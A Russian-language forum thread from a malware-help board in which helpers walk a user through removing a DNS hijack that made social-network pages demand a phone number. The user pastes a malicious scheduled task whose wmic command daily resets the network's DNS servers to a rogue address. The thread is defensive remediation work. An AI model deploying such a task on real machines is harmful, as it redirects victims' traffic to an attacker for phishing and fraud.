D@gon 72 Опубликовано 5 января, 2014 Share Опубликовано 5 января, 2014 Здравствуйте!!! При открытии строниц вконтакте и одноклассниках просит ввести номер телефона. virusinfo_syscheck.zip virusinfo_syscure.zip log.txt info.txt Цитата Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 5 января, 2014 Share Опубликовано 5 января, 2014 Важно! на Windows Vista/7/8 запускайте HiJackThis через контекстное меню проводника от имени Администратора. Пофиксите следующие строчки в HiJackThis если они у вас есть. O17 - HKLM\System\CCS\Services\Tcpip\..\{98E01E7C-AB5D-481B-96DC-97E249EA367D}: NameServer = 37.10.116.202,8.8.8.8 Перезагрузите компьютер, снова запустите HijackThis и убедитесь, что этих строк там больше нет. Если после фикса пропадет Интернет, впишите в настройки DNS адреса, выданные Вам провайдером (см. договор или звоните в их техподдержку). Очистите куки и кэш браузеров Сделайте новые логи RSIT. 1 Цитата Ссылка на сообщение Поделиться на другие сайты
D@gon 72 Опубликовано 5 января, 2014 Автор Share Опубликовано 5 января, 2014 Перезагрузите компьютер, снова запустите HijackThis и убедитесь, что этих строк там больше нет. Эта строчка осталась( Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 468 Опубликовано 5 января, 2014 Share Опубликовано 5 января, 2014 Запускали HiJack от имени Администратора по правой кнопке мыши? Цитата Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 5 января, 2014 Share Опубликовано 5 января, 2014 + Сообщите содержимое этих папок: C:\Windows\Tasks C:\Windows\System32\Tasks Цитата Ссылка на сообщение Поделиться на другие сайты
D@gon 72 Опубликовано 5 января, 2014 Автор Share Опубликовано 5 января, 2014 Запускали HiJack от имени Администратора по правой кнопке мыши? Прошу прощения забыл про это))) Все разблокировалось. Спасибо за оказанную помощь)) Цитата Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 5 января, 2014 Share Опубликовано 5 января, 2014 На всякий случай еще сообщите содержимое этих папок: C:\Windows\Tasks C:\Windows\System32\Tasks Цитата Ссылка на сообщение Поделиться на другие сайты
D@gon 72 Опубликовано 5 января, 2014 Автор Share Опубликовано 5 января, 2014 В папке C:\Windows\Tasks SA.dat SCHEDLGU.txt C:\Windows\System32\Tasks Цитата Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 5 января, 2014 Share Опубликовано 5 января, 2014 Процитируйте содержимое задания at1. Цитата Ссылка на сообщение Поделиться на другие сайты
D@gon 72 Опубликовано 5 января, 2014 Автор Share Опубликовано 5 января, 2014 <?xml version="1.0" encoding="UTF-16"?> <Task version="1.0" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo /> <Triggers> <CalendarTrigger> <StartBoundary>2013-12-28T20:48:00</StartBoundary> <ScheduleByWeek> <DaysOfWeek> <Sunday /> <Monday /> <Tuesday /> <Wednesday /> <Thursday /> <Friday /> <Saturday /> </DaysOfWeek> </ScheduleByWeek> </CalendarTrigger> </Triggers> <Principals> <Principal id="Author"> <UserId>@AtServiceAccount</UserId> <LogonType>InteractiveTokenOrPassword</LogonType> <RunLevel>HighestAvailable</RunLevel> </Principal> </Principals> <Actions Context="Author"> <Exec> <Command>wmic.exe</Command> <Arguments>nicconfig where IPEnabled=true call SetDNSServerSearchOrder (37.10.116.202, 8.8.8.8)</Arguments> </Exec> </Actions> </Task> Цитата Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 5 января, 2014 Share Опубликовано 5 января, 2014 Запакуйте содержимое задания at1 в zip архив с паролем virus и отправьте через данную форму. 1. Выберите тип запроса "Запрос на исследование вредоносного файла". 2. В окне "Подробное описание возникшей ситуации" наберите "Выполняется запрос хэлпера". 3. Прикрепите файл карантина 4. Введите изображенное на картинке число и нажмите "Далее". 5. Если размер карантина превышает 15 Мб, то карантин отправьте по адресу newvirus@kaspersky.com Полученный ответ сообщите здесь (с указанием номера KLAN) Задание удаляйте. Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.